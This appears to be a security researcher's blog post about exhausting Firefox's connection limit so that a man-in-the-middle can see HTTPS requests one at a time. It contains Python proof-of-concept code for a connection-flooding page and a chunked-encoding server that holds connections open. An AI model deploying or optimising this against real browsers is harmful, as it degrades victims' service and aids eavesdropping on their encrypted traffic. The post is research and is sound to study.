19 posts left…
So PyLoris doesn’t work particularly well for port exhaustion on the server, but what if we can exhaust the connections on the client to better meter out traffic? If it worked, that would make it easier for a MITM to see each individual request. So I started down a rather complicated path of using a mess load of link tags on an HTTP website to try to affect the connections on the HTTPS version of the same domain. No joy. It turns out that the limits placed on one port don’t affect what happens on another (at least in Firefox). So while I can exhaust all the connections to a domain over a single port, I can’t do anything using HTTPS - or so it seemed (unless I was willing to muddy the water further by sending a bunch of requests that I knew were a certain size to the HTTPS site - which just seemed more painful than helpful).
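For the curious, the flood page is trivial to generate. This is a hypothetical sketch (the `flood_page` helper, the `/slow?id=` endpoint, and the use of img tags rather than literal link tags are all my assumptions, not what I actually ran) - the idea is just a pile of tags that each force the browser to open or queue another connection to the same host:

```python
def flood_page(host: str, count: int = 100) -> str:
    """Build an HTML page stuffed with img tags, each pointing at a
    (hypothetical) slow endpoint on the target host so the browser
    burns a connection per tag. Names here are illustrative only."""
    tags = "\n".join(
        f'<img src="http://{host}/slow?id={i}" alt="">' for i in range(count)
    )
    return f"<!doctype html>\n<html><body>\n{tags}\n</body></html>"
```

Serve that from the HTTP site and the browser dutifully eats its own per-host connection pool - which, again, did nothing for me over on the HTTPS port.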
Then, based on some earlier research, I stormed into id’s office and started bitching that there was no point in trying to stop port exhaustion if they were going to allow tons of connections anyway, just over multiple sockets. As the words came out of my mouth I realized I had come up with the answer - a ton of webservers. I guessed that there must be some upper bound on outbound connections, probably at or below 130. You should have seen id’s face as I asked him to set up 130 connections / 6 connections per socket = 22 webservers for me. Hahah… I thought he’d kill me.
It turns out it’s nowhere near 130 open connections. Firefox sets a rather arbitrary 30-connection global limit. So if you can create 5 open webservers, exhaust all 30 connections, and free up only one long enough to let the victim download one request at a time, I think we’re in business. Makes sense in theory. The problem is that it’s REALLLLY slow. I mean… painful. In my testing it seemed more like the server was broken entirely from the victim’s perspective. But eventually - and in some cases I mean minutes later - it would load. I’m sure the attack could be optimized: once no more packets are being sent (because the image has finished downloading or whatever), that could signal the program to free up a connection. That’s opposed to the crapola time-based solution I came up with for testing, which used chunked encoding to force the connection to stay open without downloading anything. So I bet this attack could work if someone put some tender loving care into it, but it was kind of a huge waste of time for me personally - and for poor id.
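To make the time-based hold-open part concrete, here’s a minimal sketch of one of those servers, assuming plain sockets and the chunked-encoding trick described above (this is my illustration, not the actual test rig - the port numbers, timings, and function names are all made up). Each accepted connection gets a chunked response that dribbles a byte every few seconds, so the browser counts it against its global limit until the terminating chunk finally frees the slot:

```python
import socket
import threading
import time

def chunk(data: bytes) -> bytes:
    """Frame one piece of data as an HTTP/1.1 chunk: hex length, CRLF, data, CRLF."""
    return b"%x\r\n%s\r\n" % (len(data), data)

def hold_open(conn: socket.socket, hold_seconds: int = 60) -> None:
    """Answer with Transfer-Encoding: chunked and keep dribbling tiny
    chunks, tying up one browser connection for hold_seconds."""
    conn.recv(4096)  # read (and ignore) the request
    conn.sendall(
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: text/plain\r\n"
        b"Transfer-Encoding: chunked\r\n\r\n"
    )
    deadline = time.time() + hold_seconds
    while time.time() < deadline:
        conn.sendall(chunk(b"."))  # keeps the connection alive and counted
        time.sleep(5)
    conn.sendall(b"0\r\n\r\n")     # terminating chunk finally frees the slot
    conn.close()

def serve(port: int) -> None:
    """One hold-open server per port; run five of these to eat the pool."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("", port))
    srv.listen(50)
    while True:
        conn, _ = srv.accept()
        threading.Thread(target=hold_open, args=(conn,), daemon=True).start()
```

Run one per port (say, 8001 through 8005) and you’ve got the 5 servers × 6 connections each that soak up the 30-connection limit. A smarter version would watch for the victim’s request finishing instead of using a fixed timer, which is exactly the optimization I didn’t bother with.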
Incidentally, for those who have never seen or met id, and would like to know a little about the other side of webappsec that I don’t talk about much here (the configuration, operating system and network), your chance is nearing. There’s a rumor that he’ll be speaking at LASCON in October. He’ll be talking about how he’s managed to secure ha.ckers.org for all these years despite how much of a target I’ve made it. Should be fun.